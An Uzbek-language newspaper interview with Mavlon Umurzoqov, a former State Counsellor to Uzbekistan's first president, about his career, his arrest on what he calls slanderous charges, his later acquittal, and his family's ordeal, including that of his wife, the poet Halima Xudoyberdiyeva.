• Ватаннинг “олтин хазина”си
• Сиёсатчига қарши ишлаган фитна ва туҳмат “машина”си…
• Давлат маслаҳатчисидан сиёсий маҳбусгача…
• Собиқ Давлат маслаҳатчисининг топилмаган тиллалари…
• Халқ шоиридан ечиб олинган тақинчоқлар….
Адолат ҳақида фикр юрита туриб ёзувчилардан бири уни “дунё устидан ўтгувчи дор”га қиёслаган. Унда юргандан кўра у ҳақда хаёл сурган афзалроқ дейди. Дарҳақиқат, адолатсизликка, ҳақсизликка учраган одам адолат ҳақида ана шундай ўйга бориши табиий. Биз Биринчи Президентнинг собиқ Давлат маслаҳатчиси Мавлон Умурзоқов билан унинг ҳаёт йўллари ҳақида суҳбатлашар эканмиз, туҳмат ва фитнанинг, ноҳақлик ва иғвонинг йўли барибир боши берк кўчада эканлигига амин бўлдик. Марҳамат, сизни суҳбатдошимиз билан юзма-юз қолдирамиз.
— Мавлон ака, мана Ватанимиз Мустақил бўлганига 29 йил тўлди. Бу ўз-ўзидан бўлмаган, албатта. Мустақиллик қабул қилинган паллаларда сиз давлат маҳкамасида нуфузли лавозимда ишлагансиз. Янги давлат барпо этишнинг ўзи бўлмаган бўлса керак?
— Мустақиллик афсонавий тортиқ сифатида осмондан тушмаган. Аслини олганда собиқ СССР деб аталмиш империя 1970 йиллар охири 1980 йиллар бошида сиёсий, иқтисодий, маънавий жиҳатдан инқирозга юз тута бошлаган эди. Ўша йиллардаги турғунлик нафақат иқтисодда, балки мафкурада, одамлар орасидаги муносабатда кўринарди. Элига ва ватанига эмас, ўз бошлиғига садоқати боис танланган кадрларнинг хато ва камчиликлари урчиган ва бунинг оқибатида КПСС деган “машина” юришдан чарчаган эди. Шунинг баробарида унга тобе мамлакатлар ва аҳолининг ҳам сабр косаси тўлган бир палла эди.
“Қайта қуриш” дегани билан унинг аниқ бир стратегияси йўқ, ошкоралик деб жуда кўп корхона ва ташкилотларни тартибдан чиқариб юборган Москванинг бошқарув қобилияти аллақачон кома ҳолатига келаётганлиги аниқ бўлиб қолди. Буларнинг ҳаммаси СССРнинг парчаланишига ва мустақилликка эришишга қулай вазият яратган эди. Натижада мамлакатимиз собиқ Иттифоқ республикалари орасида биринчи бўлиб, ўз мустақиллигини эълон қилди ва 1991 йил 1 сентябрь — Мустақиллик куни деб эълон қилинди. Бу албатта, жуда қувончли тарихий ҳодиса. Бироқ ана шу лаҳзадан бошлаб бизнинг, айниқса, давлат тепасида турган ҳар бир мутасаддиларнинг елкасига жуда катта масъулият юкланди.
Биз бу даврда кабинетда ўтириб ишламаганмиз, халқ орасига кириб борганмиз. Бу пайтда қўйилган илк масала “Пахта иши” масаласида ноҳақ қамалганларни озод қилиш масаласи бўлди.
1991 йилнинг декабрь ойида Наманган воқеалари содир этилди. Буни кўпчилик яхши эсласа керак. Тоҳир Йўлдошев деган кимса оломонни тўплаб, улар номидан Ислом Каримов олдига Ўзбекистонни Ислом жумҳурияти деб эълон қилиш, диний сиёсат асосида давлатни бошқариш каби ўнлаб талабларни қўйди. Ўша куни аэропортда И.Каримовни кузатар эканмиз, Исмоил Жўрабеков ва мен тинчлик ўрнатилгунча бир муддат Наманганда қолишимиз ҳақида топшириқ олдик. Бу бир муддат бир ярим ойдан ошишини ўшанда икковимиз ҳам билмаган эдик. Бу вақт мобайнида мактаб, коллеж, институт ёшлари билан учрашувлар қилиб, вазиятни тўғри баҳоловчилар сонининг ошишига эришдик. Тоҳир Йўлдошев ва Жума Намангоний эса ўз ҳаракатининг келажагини билгач, хорижга қочиб кетишди. Борингки, Ўш, Фарғона, Бўка воқеаларининг ҳар бири биздан оқилона иш олиб боришни талаб қиларди. Мамлакат ҳаётидаги энг оғир, энг қалтис, энг тарихий паллаларда ишлаб, элимизга хизматимиз сингиганидан ғурурланиб кетамиз.
— Мамлакатимиз ривожига ҳисса қўшган сиёсатчи, иқтисодчи олим сифатида бугунги ижтимоий, иқтисодий жараёнларни қандай баҳолайсиз?
— Бугун одамзотнинг бошига тушган бу синовли дамлардан чиқиш учун ҳар бир мамлакат ўзича йўл тутмоқда. Аҳолининг ижтимоий ёрдамга муҳтож қатламига алоҳида эътибор қаратилаётгани таҳсинга сазовор. Ватанпарвар, фидойи ва ислоҳотчи Президентимиз Шавкат Мирзиёев пандемия шароитида халқимизнинг манфаатларини ўйлаб, қатор фармон ва қарорларга имзо чекдики, буни қувонч билан эътироф этаман. Кези келганда айтай, шундай оғир ва синовли кунларда халқимизнинг ёрдамга муҳтож қатламига ажратилган маблағлар айрим ноинсоф мулозимлар томонидан талон-торож қилинди. Шу юртнинг бир фуқароси сифатида бу хилдаги муносабатдан юрагим қаттиқ оғриди.
Ижтимоий-иқтисодий тизим билан боғлиқ улуғвор мақсадлар сари дадил қадам ташланяпти, лекин уларнинг тўла-тўкис амалга ошиши енгил кечаётгани йўқ. Бошқарув тизимида фаолият олиб бораётган айрим мулозимларнинг нўноқлиги эса, бугунги тезкор ва глобаллашув жараёнларига мослаша олмаётгани, коррупция ботқоғидан қутула олмаётгани, фидойилик ва ватанпарварлик туйғуларидан йироқлиги мамлакатда бошланган жиддий ислоҳотларни қийинлаштирмоқда. Юртда бошланган янгича ёндашув бу хилдаги мулозимларга муросасизлик қилиб, зудлик билан улардан воз кечиш кераклигини кўрсатмоқда. Чунки, Президент Шавкат Мирзиёев илгари сураётган «Халқ давлат идораларига эмас, давлат идоралари халққа хизмат қилиши керак», «Фуқаролар эмас, ҳужжатлар ҳаракатланади», «Одамлар эртага эмас, узоқ келажакда эмас, бугун яхши яшашни истайди», деган мутлақо янгича тамойиллари одамлар қалбида умид ва ишонч туйғуларини уйғотди.
Шавкат Мирзиёев даври халқимиз ҳаётида уйғониш ва ислоҳотлар даври бўлиб тарих саҳифаларига кириши учун бошланган кенг кўламли ислоҳотлар ўзининг самарасини бериши керак. Салмоқли ва халқимиз кутаётган фаровон ҳаётни барпо этиш хоҳлаймизми, йўқми, барибир етук кадрлар фаолияти билан бевосита боғлиқ. Вақт ва умр эса кутиб турмайди. Шиддат билан ўтиб бормоқда. Шундай бўлгач, фидойи, жасоратли, ватан ва халқимиз манфаатларини ўйлайдиган одамларнинг масъул лавозимларда фаолият олиб боришларига барчамиз бирдек ҳаракат қилишимиз бугунги муҳим вазифамизга айланмоғи лозим. Тарихдан маълум, доно подшоҳларнинг ёнида донишманд вазирлар, билимдон алломалар, юксак иқтидор эгалари қанот бўлган. Ахир Ҳусайн Бойқарога ҳазрат Навоийни қанчалик ёмонлашмасин, энг мураккаб вазиятда султон Навоийга суянган. Салжуқий ҳукмдорларга қирқ йил бош вазирлик мақомида фаолият олиб борган доно вазир Низомулмулк ақлли ва донишмандлиги туфайли мамлакатнинг ишонч тоғига айланган. Демак, ноёб истеъдод эгалари Ватаннинг “Олтин хазина»си сифатида ислоҳотчи ва толмас Президентнинг ёнида бўлишлари бошқарувда адолат ва ҳақиқатнинг қарор топишини таъминлайди, деб ўйлайман. Ана ўшанда мамлакат гуллаб, яшнайди. Ана ўшанда одамларимиз иш излаб, турли мамлакатларда сарсону саргардон кезмайдилар.
— Давлат бошқаруви тизимида ишлаган даврингиз катта бир тарих, албатта. Лекин бу кўпчилик учун қизиқ эканлиги аён. Айтинг-чи, бу тизимга ишга келишингизга нималар сабаб бўлган, катта лавозимда ишлашдан, сиёсат “ўйинлари”дан қўрқмаганмисиз?
— Ҳар бир одамнинг келажагига, унинг шаклланишига оилавий муҳит, тасодифий учрашувлар ёки ҳодисалар сабаб бўлади. Бу жараён четдан қараганда табиий ҳолдай кўринади. Менинг иқтисодчи бўлишимга пахта терими пайтида уйимизда икки ой яшаган Тошкент Давлат халқ хўжалиги институтининг беш нафар талаба — ҳашарчилари сабаб бўлган эди. Уларнинг одоби, камтарлиги ва ўзаро муносабатларига ҳавас қилганман. Мана шу ҳавас мени Тошкент Давлат халқ хўжалиги институтига етаклаб келган. 1970 йилда институтни имтиёзли диплом билан тамомлаганимдан сўнг мени ректоримиз М.Қориев ташаббуси билан институтда олиб қолишди. Кейинроқ Москва Давлат молия институтига иш ўрганувчи — тадқиқотчи бўлиб бордим ҳамда у ерда аспирантурага қабул қилиндим.
Ҳа, умр оқар дарё деганлари рост экан, кўз очиб юмгунча ўтиб кетди. У ерда асосий вақтим Ленин номидаги ўша машҳур кутубхонада кечарди. Ҳафтада икки кун талабаларга амалиётдан машғулот ўтардим. Ҳар байрамда Қизил майдонга пиёда йўлга тушардик. Москвада диссертациямни ҳимоя қилгандан кейин Тошкентга қайтиб яна институтда дарс бера бошладим. Институт ўқитувчилари ёшларга маърузалар ўқиш учун вилоятларга чиқардик. Бу гуруҳларга ўша вақтлар Ўзбекистон Компартияси Марказий қўмитаси ва Комсомол ташкилоти масъул ходимлари раҳбарлик қилган. Ана шундай сафарлардан сўнг мени Комсомолнинг марказий қўмитасига ишга таклиф қилишди. У ерда озроқ ишлаб, сиёсат ҳавосида озми-кўпми тобланишга тўғри келди.
1985 йилда мени Марказқўмга чақириб, Ишлар бошқармасининг молия сектори мудирлигига ишга таклиф этишди. Шу сабаб, Москва — КПСС Марказий комитетига суҳбатга бордим. КПСС МК аппаратининг Ўзбекистон бўйича куратори Н.Гирько, ишлар бошқарувчиси Е.Кругина, Марказқўм котиблари Бирюкова ва Долгихларнинг суҳбатидан ўтгачгина ушбу лавозимга тайинланганман.
— Энди сир бўлмаса керак, ўша даврдаги “Марказқўм”да сиз ишлаган сектор қандай вазифани бажарган?
— Бу сектор асосан партиянинг бюджети билан шуғулланган. Ўша йиллар Ўзбекистонда партиянинг молиявий аҳволи кўпгина бошқа иттифоқдош республикаларга қараганда анча яхши бўлган. Республикадан то энг қуйи бўғинларгача ходимларнинг сони, маошларигача “Марказ”дан белгиланарди. Ҳатто партия қўмиталари котибларига бириктирилган автомашиналарнинг бир йилда қанча километр юриши, қачон шиналари алмашиши муддати ва тартиблари ҳам КПСС Марказий Комитети томонидан тасдиқланарди. Бу эса “Марказ”нинг қуйи бўғинларига ишончсизлигидан далолат берарди. Ўз навбатида партия ходимлари орасида норозилик кайфиятининг туғилишига сабаб бўлган.
— Кадрлар сиёсати қандай олиб борилган. Ўша пайтда мамлакат қай даражада ўзининг етук ва салоҳиятли кадрларига эга эди?
— Айтишим керакки, совет давридаги кадрлар сиёсатини юз фоиз қоралаб бўлмайди. Кадрларни танлашда асосан Республика, вилоят, шаҳар ва туман даражасида кадрлар захираси ҳужжатларига асосланарди. Вилоят раҳбарлари ва муовинлари “Москва тасдиғи”дан ўтиши шарт эди ва шу боисдан раҳбар деганлари Москванинг кўнглини овлаш билан банд бўлган. Рус тилини билмаган, ташаббускор илмий кадрларнинг раҳбарлик лавозимига ўтиши ўта мураккаб ҳол эди. Айниқса, Шароф Рашидов ўлимидан сўнг кадрлар сиёсати бутунлай “Марказ” қўлига ўтган. Ўзбекистон Республикаси Компартияси марказқўмининг олти нафар котибидан уч нафари рус миллатига мансуб бўлган. Тез-тез “Марказ”дан “десантчи” — раҳбарлар ташланарди. Бундан кўзланган мақсад аён — Ўзбекистонда “тартиб ўрнатиш”, шиори остида ўзбек халқининг ғурурини синдириш, ўзларига янада кучлироқ тобе қилиш, элни эл билмас оломонга айлантириш эди.
— Маълумки, сиз ишлаган даврларда юқори лавозимларга кураш зимдан давом этган. Манфаатлар, лавозимлар тўқнашуви оралаб тўғри кадр танлай билиш жуда мураккаб кечган бўлса керак?
— Албатта. Бу ерда икки хил манфаатлар тўқнашуви юз берган: юрт, мамлакат манфаати учун ва ўз уруғ-аймоғи-ю ошна-оғайниси учун хизмат қилгувчилар манфаатлари. Бўш эмас, муносиб ўринга муносиб кадрларни танлаш ва тайинлаш аждаҳо оғзидан олов келтиришдай хатарли эди. Чунки тепангизда ҳар қандай фитна сизга қарши қилич қайраб турганлигини ҳис қилиб туриш мумкин эди у пайтларда.
Ўша пайтда Ўзбекистон телерадиокомпанияси раиси ўринбосари лавозимига И.Каримовнинг таклифи билан юртимиздаги истеъдодли журналистлардан бирининг номзодини тайинлаш тўғрисида фармойиш тайёрлаш буюрилди. Эртаси куни ушбу фармойиш лойиҳасини тайёрлаб олиб кирсам, собиқ президент бу масалага кейинроқ қайтамиз, деб бу ишни орқага сурди. Худди шунингдек, Бош вазир ўринбосари лавозимига Тошкент шаҳридаги туман ҳокимларидан бирининг номзодини тавсия қилган эдик. Президент розилик берди, бироқ бир кун ўтиб бу масала ҳам тўхтаб қолди. Бу ҳам ўша атрофдаги фитначиларнинг, ошна-оғайнибозларнинг иши бўлган. Улар иложи борича ҳалол, малакали кадрлар устидан турли иғво ва фитналарни уюштириб, имкони борича улардан тезроқ қутулишга бел боғлаган эдилар. Нафақат мен, балки халқ ва миллат тараққиёти йўлида астойдил меҳнат қилиб, Президентнинг назарига тушган ҳар қандай одам саройдаги бир уюм фитначиларнинг бош душманига айланган.
— Ўша йилларда кадр танлашда маълум бир меъёрларга амал қилинганми?
— Мустақиллик эълон қилингандан сўнг, кадрлар борасида “Марказ тасдиғи” каби сарқитлар ва иш услубларига барҳам берилди. Янгича тузум ва унинг тузилмасида сезиларли ўзгаришлар қилиш учун янгича руҳ ва янгича куч билан ишлайдиган кадрларни топиш устида иш олиб борилди. Айтганимдай, кадрларни топиш, танлаш, уларни муносиб ўринларга қўйиш жуда қалтис ва оғриқли масалалардан бири эди.
Чунончи, маҳаллийчилик, ошна-оғайнигарчилик ўша йиллар кадрлар сиёсати кун тартибидаги асосий масала бўлган. Ўшанда бунга барҳам беришнинг янги усулини ўйлаб топдик. Унга кўра мамлакат марказий органларида қўмиталардан тортиб, вазирликларгача ҳамма вилоятлардан вакиллар бўлиши, яъни маълум квотага бўйсуниш керак эди. Квота ўша вилоят аҳолиси мамлакат аҳолисининг неча фоизини ташкил этишига қараб белгиланарди. Кадр танлашнинг ушбу усули анча-мунча муваффақиятли кечган эди.
Президент девонида ишлаб юрганимда ва ҳозир ҳам раҳбар атрофида майда гаплар айланиши мени кўп ўйга толдиради. Менимча, бизда шахсга сиғиниш эмас, мансабга сиғиниш унсурлари ҳар доим устунлик қилмоқда. Ҳар бир даврда ҳам шикоятчилар бўлган. Хўш, улар нимадан пайдо бўлади: албатта, ўзи дуч келган муаммонинг қуйи ҳокимиятларда адолатли ҳал этилмаганидан. Чунки ҳар қандай шикоят замирида озми-кўпми адолат истаги ётади. Қаердаки адолат бўлмаса, ўша фуқаро раҳбар эшигидан норози бўлиб чиқади. Натижада давлат сиёсатига нисбатан ишончсизлик пайдо бўлади.
Шунингдек, ҳар бир раҳбар ўз соҳасини, ўз касбини романтик даражада яхши кўриши керак. Менимча, ҳатто сиёсатчи ҳам романтикага мойил бўлмоғи керак. Буюк санъаткор Растраповичнинг буюклиги нимада эди? Унинг буюклиги “Туғилганидан ўлимига қадар унинг учун фақатгина мусиқа борлигидадир”. Раҳбар учун ҳам унинг креслоси эмас, иши мазмунга айланмоғи керак.
Яна қайтариб айтаманки, кадрлар сиёсатида ҳалоллик ва адолат бош мезондир. Баъзан оммавий ахборот воситалари орқали фалон ҳоким фалонча минг доллар олибди, ёки писмадон ҳоким ўз вилоятидаги бир оиланинг уйини ўзи бош бўлиб буздириб ташлабди, деганга ўхшаш хабарларни ўқиб қоламан. Мана шу ва шу каби ҳолатлар боис, аллақандай калтабин раҳбарларнинг эгри сиёсати билан ҳукумат ҳам, давлат ҳам уятга қолади, юзи шувут бўлади.
— Ўтган йиллар давомида сиёсатчилардан кимларнинг шахси ва амалидаги уйғунликни қадрлайсиз? Сизнингча Ўзбекистон ўзининг профессионал сиёсатчиларига эгами?
— Аввало, мен Шароф Рашидов шахсига ва фаолиятига чексиз эҳтиром билан қарайман. Шароф Рашидов республикамизни чорак аср оқилона бошқарган давлат арбоби эди. У кишининг меҳридан, ғамхўрлигидан баҳраманд бўлган одамлар жуда кўплаб топилади. Шароф Рашидов давлатни бошқарган йиллар мамлакатнинг гуллаган даври эди. Ўша даврда республика иқтисодиётини ҳар томонлама ривожлантириш ўз-ўзидан амалга ошмаган. Унинг замирида катта курашлар, собиқ “Марказ”нинг корчалонлари билан тил топишишлар, ҳатто бир тонна цемент олиш учун уларнинг розилигини олиш осон кечмаган. Мамлакат халқ хўжалиги тармоқларининг ҳар бири бевосита у кишининг раҳбарлигида ривожланган. Энди у кишининг номи қораланишлари-ю уни оқлаш учун қилинган ҳаракатларни айтай десам, бунинг ўзи алоҳида бир мавзу.
Шунингдек, яна бир иқтидорли, талабчан сиёсатчи бу Исмоил Ҳакимович Жўрабеков, мен уни 1985 йилдан буён биламан. Бу одам билан иш юзасидан республикамизнинг вилоят, туман, колхоз ва совхозларигача айланиб чиққанман. Ҳокимлар, колхоз, ҳатто бригада бошлиқларининг исмигача биларди. Халқ ҳаётига сингиб кетмаган одам бундай яқинликни ҳис қилмасди, албатта. Умрини, жўшқин фаолияти ва салоҳиятини, қишлоқ ва сув хўжалигини ривожлантиришга бағишлади. У мамлакатимизнинг ҳар бир қарич ерини қадамма-қадам айланиб чиққан. Бош вазир ўринбосари, Президентнинг Давлат маслаҳатчиси лавозимларида туриб ҳам оддий халқнинг “ўз одами”га айланиб кетган эди. Унинг қатъий иродаси, сиёсий босиқлиги сабаб мамлакатимиз жуда кўп таҳликали вазиятлардан эсон-омон ўтган. Бу каби кадрлар кам эмасди. Б.Раҳимов, Н.Худойбердиев, М.Мусохонов, О.Салимов, О.Содиқов, А.Тўраев, С.Сирожиддинов каби юзлаб кадрлар эл олқишига сазовор бўлганлар. Мен бу тарихий шахсларни ҳамда бугун мамлакатимизда муҳим ислоҳотларни ўтказаётган Шавкат Миромонович Мирзиёевни ҳақли равишда юртнинг асл фарзандлари ва оқил сиёсатчилари деб биламан.
— Русларда бир машҳур мақол бор: “Век живи, век учись” дейишади. Ўзимизда эса бундан ҳам кучли гап бор: “Бешикдан то қабргача илм изла”. Шундай экан, ҳукумат таркибида ишлаган йилларингизни бугун ўзингиз қандай баҳолайсиз?
— Ҳар қандай одам ўзи қилган ишларидан кўнглим тўлди, қотириб бажардим, деган фикрлардан узоқ бўлмоғи керак. Шу ишни сенинг ўрнингда бошқа одам бажарганида балки ундан ҳам яхшироқ натижага эришган бўлармиди…
Энди ўзим бажарган ишларга келадиган бўлсам, улардан кўнглим тўқ бўлганидан тўлмаган ҳоллар кўп бўлган. Нега, деб сўрарсиз? Қон-қонимизга сингиб кетган одат бор: бир-биримизга тўғри сўзни айта олмаймиз, юз-хотир қиламиз, андишага бериламиз. Баъзан эса қўрқув виждонимиз устидан ҳам ғолиб келади. Аксар ҳолларда раҳбарлар танқид қилган одамнинг фикрини ўрганиб, хулоса чиқариш ўрнига улардан қасд олиш пайига тушадилар. Шундай экан, ҳуқуқий давлат қуриш йўлидан бораётган мамлакатда фуқароларнинг шахсий фикри қаерда қолади?!
— Мамлакат ва миллат тақдири учун тиним билмай ишлаб, яна номингизга “доғ” тушиб, туҳмат билан ишдан четлатилиш бу чидаш оғир бўлган азобли ҳолат, албатта. Ишдан четлатилганингизда эҳтимол, адолатли бўлишга адолатнинг, ҳақиқатни айтишга ҳақиқатнинг қурби етмаган бўлиши мумкин. Бугун ҳаммасини очиқласа бўлар, чунки Олий Суд Сизнинг айбсиз эканлигингизни исботлади. Айтинг-чи, агар мумкин бўлса, ўшанда нима бўлган эди?
— Албатта бу азобли, қайғули ҳол, менинг раҳбарлигимда ишлаётган масъул ходимнинг ўз бошлиғи устидан шикоят ёзиши кечириб бўлмас ҳолат эди. Бироқ бу шикоятнинг, тўғрироғи, фитнанинг ташкилотчилари бошқалар бўлган. Бу хатда гўёки менинг маҳаллийчиликка, ошна-оғайнигарчиликка берилганим битилган эди. Оддий референтликдан бир йил ичида ўринбосарликкача кўтарилган кимсага “устоз”ини сотиш эвазига катта амалларни ваъда беришган. Бироқ ниятлари амалга ошгач, фитна ташкилотчилари уни кераксиз буюмдай четга улоқтиришган.
Шундан сўнг ўз вазифамдан озод этилиб, Сирдарё вилоят ҳокимига ўринбосар этиб тайинландим. Бироқ бу билан фитначилар тинчимади. Гўёки собиқ давлат маслаҳатчиси келгусида давлат раҳбари вазифасини эгаллашга интилмоқда, деган уйдирмаларни тарқатаверишган. Ана шу сабаб менинг ишимни маҳкамага тортишга кўрсатма берилган. Суд ҳукмида эса ҳатто чет элдан совға сифатида олиб келинган ва қиймати 50 долларга баҳоланган икки килограмм конфет ҳам пора сифатида кўрсатилган эди.(Орадан 22 йил ўтиб ушбу ҳукм Олий судда қайта кўрилганида бу айблов тарозига қўйишга ҳам ярамади). Жиноий далиллар етарли бўлмагани сабабли янги, турли хил қабиҳликларни ўйлаб топишарди. Катта бойлик орттирган бўлиши мумкин деган тахмин билан Боёвут туманида яшовчи ака-укаларим ва қариндошларимнинг уйлари ҳам тинтув қилинди. Олтин бор жойда чириллаб овоз чиқарадиган ускуна билан бойлик ахтаришди. Ускуна ҳар чириллаб овоз чиққанида хурсанд бўлиб қарашса, афсуски, у олтин эмас, тупроқ остида қолиб кетган консерва қутиси ёки занглаган темир бўлаклари бўлиб чиққан экан.
— Ахир, ўша пайтда Олий Мажлис депутати бўлгансиз-ку. Наҳотки Қонунчилик палатаси ўз депутатини ҳимоя қила олмаган бўлса?
— Айнан шундай. Олий Мажлис депутати, қолаверса, ҳукумат таркибидаги сиёсатчи эдим. Бироқ ҳамманинг тилига қулф осилган эди. 1994 йил 4 августда жиноий жавобгарликка тортилдим ва ҳибсга олиндим. На Олий Мажлис, на Халқ демократик партияси ўз аъзосининг тақдири билан қизиққани йўқ. Биласизми, сен Адолат деб тикиладиган ҳукуматнинг ўзи бошингга уюм-уюм иғвони ағдариб ўтирса, чидаб бўлмас эди бунга. Ҳукм ўқилиб, қамоқхонага жўнатилганимдан сўнг ҳам кузатув ва босимлар мунтазам давом этаверди. Бир зонага юборишади, бироз вақт ўтгандан кейин турмалар бошқармасидан кўрсатма келади: “Фалон сайлов яқинлашмоқда. Бу зонада контингент жуда кўп, “Фалончиев” сайловга ёмон таъсир кўрсатиши мумкин”. Шундан сўнг мени яна бошқа зонага кўчиришади. Қизиқ, турмада ўтириб, махбус ҳолимда сайловларга қандай қилиб “ёмон таъсир” ўтказишим мумкин эди? Кўряпсизми, қанчалар аянчли, тутуруқсиз ва кулгули бўлган бу хатти-ҳаракатлар. Амнистия вақти яқинлашганда эса арзимаган хатоларни топишарди, мақсад — амнистияга илинтирмаслик бўлган.
Биринчи президент Ислом Каримовга хат ёзганимдан сўнг, унинг фармойиши билан 1996 йил 9 августда мен озод этилдим. Бироқ Тошкентга — оилам бағрига эмас, Сирдарёга — укаларим яшаётган қишлоққа боришим керак экан. Қишлоқда уй-жойим йўқ, шунга қарамасдан, уйсиз қишлоққа рўйхатга олинган эдим. Нима учундир, ўз жонажон уйимдан рўйхатдан ўчирилган бўлганман. Узоқ йиллар қўлимга паспортим ҳам берилгани йўқ. Фақат 2015 йил, 21 октябрда Тошкентга — ўз уйимга рўйхатга олиндим.
— Бу каби даҳшат ўпқонларига ҳар куни минг марта йиқилиб, унинг оғриқларини енгиб яшаш нозиктаъб шоирамиз Ҳалима Худойбердиевага ҳам осон бўлмаган бўлса керак?
— Ҳалима опангиз ўзининг охирги китобларидан бирини “Осойишта шам” деб атади ва ўша китобдаги бир туркум шеърлар “Даҳшатли ёз” деб номланган. Бу бежизга эмасди, албатта. Чунки ўша ёз кунларида менинг, оиламизнинг, қариндош-уруғларимнинг бошига ҳаётимиздаги энг аянчли кунлар тушган эди. Ҳалиманинг ўзи ўша кунларни шундай изоҳлаган эди: “Нега даҳшатли ёз?.. Негаки ўша ёзда оиламизнинг қаҳратон совуқларидан баттар кунлари бошланган эди… Биз ёзда гоҳ изғириндан, совуқ нигоҳлар, совуқ хабарлардан музлаганмиз, гоҳ туҳмат қозонларида қоврилганмиз. Умр йўлдошим — болаларимнинг отаси қамоқда, болаларим азобда, рўзғорим паришон… Ўзим қамоқ эшикларида…”
Ҳалимани, ўғилларимни, қариндош-уруғларим ва яқин дўстларимизни доимий равишда суриштируву сўроқларга чақириб туришди. Уйни тинтув қилиб, оиламиз аъзоларига тегишли кийим-кечак, мол-мулк борми — ҳаммасини хатлов қилиб олиб кетишган. Ҳатто турмуш ўртоғимнинг тақинчоқларигача ечиб олишган. Яшаётган уйимиз хусусийлаштирилганига қарамасдан мусодара қилинган. Ушбу зулм ортидан икки фарзандимиз ҳам жиноий жавобгарликка тортилди. Улар ҳам “судланган” деган тамғани олиши керак бўлган, шекилли. Кўп ўтмай эса иккинчи ўғлим вафот этди. Бундай воқеалардан сўнг Ҳалима опангизнинг юрагидан ўтган ҳаддан ташқари қайғули онларни Сиз бир ижодкор, қолаверса она сифатида ҳис қилсангиз керак. Қамоқдан чиққандан сўнг Ҳалима опангиз ҳам, мен ҳам турли чекловлар ва кузатувлардан фориғ бўлмадик. Радио, телевидение, матбуот ва нашриётлар эшикларида биз учун катта қулфлар осиғлик турарди.
Шу ўринда яна бир воқеани гапириб берсам… 2011 йилда Ҳалима туғилиб ўсган Боёвутнинг “Тараққиёт” фермер хўжалигида учрашув уюштирилади. Унда Ҳалима билан бирга Азим Суюн, Умрзоқ Ўлжабоев, Қозоқбой Йўлдошев каби шоир ва олимлар иштирок этишган. Ўша учрашувдан эсдалик сифатида олинган фотосурат музей деворига илиб қўйилган экан. Ўша биргина фотосуратни деб мактаб директори суриштирув ва сўроққа тортилган. Мен тўла оқланганимдан сўнггина суратни қайтариб жойига қўйишган. Бу оғир дамлар кайфияти шоиранинг шеърларига кўчганди:
Кеча ҳаётга тож биз кўпларимиз,
Бугун шу ҳаётнинг мағлубларимиз…
Кеча оят мисол кўзга суртилган
Бугун ўқилмади… мактубларимиз.
— Ўшанда Сиз каби жуда кўплаб миллат ойдинларининг боши турли туҳматлар остида қолган. Бунга туҳматчи ва фитнакорлар сабаб бўлган экан-да…
— Мен каби неча ўнлаб ўз ишини севиб ишлайдиган одамларга қилинган иғво ва фитналар сабаб кадрлар сиёсати оғир аҳволга тушиб қолган эди. Адолатли, тўғрисўз ва ташаббускор кадрлар ё юртдан бадарға қилинди ёки қамалди. Ҳатто ўзининг илми билан бутун Ислом дунёсида донг таратган шайх Муҳаммад Содиқ Муҳаммад Юсуф ҳам маълум йиллар юртимизни тарк этишга мажбур бўлган эди. Айтишади-ку: “Агар подшо донишманд бўлса ҳам унинг атрофини жоҳил ва нодонлар эгалласа, подшонинг донолигига путур етади”. Энг афсусланарлиси, давлатчилик ва бошқарув бор экан, унинг атрофида ҳар доим фитначи ва иғвогарлар бўлган. Бу фисқу фасодларга алданмаган ҳукмдорларгина адолатли жамият барпо эта олганлар. Шундай экан, бугун мамлакатда адолатли тизимни тўлиқ амалга ошириш нафақат Президентнинг, балки барчамизнинг вазифамизга айланмоғи керак. Муҳтарам Президентимиз Шавкат Мирзиёевнинг “Халқимиз эртага эмас, узоқ келажакда эмас, балки бугун бахтли яшаши керак” деган улуғ нияти тўла-тўкис ҳаётга кўчмоғи лозим.
Ахир 2018 йилда мен билан бирга мен каби минглаб ноҳақ жабрланганлар, қораланганлар оқланди-ку! Оила аъзоларинг, қариндош-уруғларинг олдида юзинг ёруғ бўлишдан ҳам улуғ неъмат борми? Эл олдида-чи? Мана менинг муҳтарам Президентимиз Шавкат Миромонович олиб бораётган сиёсатга меҳрим ва хайрихоҳликларим нимадан?! Тўғриси, бу каби сиёсий донишмандлик қошида ҳайратланмай бўладими, ахир!
— Миллат тақдири ҳақида ўйлаганингизда нималар ҳақида хаёлга бериласиз? Халқни рози қилиш учун сизнингча қандай ишлаш ва қандай яшаш керак?
— Менимча, муаммолардан бири бу — фуқароларни қабул қилиш масаласидир. Чунки раҳбарлар билан халқ орасида масофанинг катталиги, улар орасидаги жар мана шу муаммодан келиб чиқади. Танишларимдан бири ўз шахсий иши бўйича мутасадди раҳбарларга 300 мартадан ортиқ хат ёзганини айтади. Наҳотки, 300 та хатдан бирортасига жавоб ололмаса? Аксарият раҳбарлар аҳолини қабул қилишдан қочадилар. Хўш, нега? Мана юқори ташкилотлар билан боғлиқ юзлаб саволлар жавобсиз қолиб кетмоқда. Американинг собиқ президентларидан Рузвельт ҳафтада икки марта журналистлар, спортчилар ва ноширлар билан суҳбат ўтказган экан. Ахир халқнинг дарду ташвишларини кўтариб юрадиган одамлар ўшалар-да.
Ҳикоя қилинишича, президент Рузвельт онаси вафот этган журналистни якшанба куни кечки овқатга таклиф қилган экан. Ёхуд бошқа сафар журналист кечикаётганлиги боис, поездни маълум муддат тўхтатиб турган экан. Айтмоқчиманки, биз халқнинг дилидагини билишимиз учун, аввало уларга яқин бўлишимиз керак.
— Айни пайтда нималар устида иш олиб бораяпсиз?
— Мен иқтисодчиман. Партия ишига ўтиш учун Москвага борганимда илмий раҳбарим, профессор Ю.Ратмировнинг уйида бўлганимда, “Сени илм билан шуғулланасан деб умид қилган эдим. Сиёсатга бекор аралашибсан” деб мени майин койиган эдилар. Бу аслида менинг нотўғри танлаган йўлиммиди ёки тақдирнинг ёзғити, ҳалигача англай олмайман. Бироқ сиёсат ўз саройидан ҳайдагани билан илм уммони мени ҳеч вақт ўзидан улоқтирмади. Ишдан четлатилганимдан сўнг Москвада докторлик диссертациямни ёқлаб келдим.
Ҳозир эса иккита — шеър ва мақолалар китобим нашрдан чиқди. Шунингдек, яна иккита китоб устида иш олиб боряпман. Бу — биографик очерклар ва Ҳалима опангиз ҳақидаги хатлар ва фикрлардан иборат китобдир. Худо хоҳласа, булар ўқувчиларга асл ҳақиқатларни очиб беради.
Гўзал БЕГИМ суҳбатлашди.
(“Hurriyat” gazetasi)
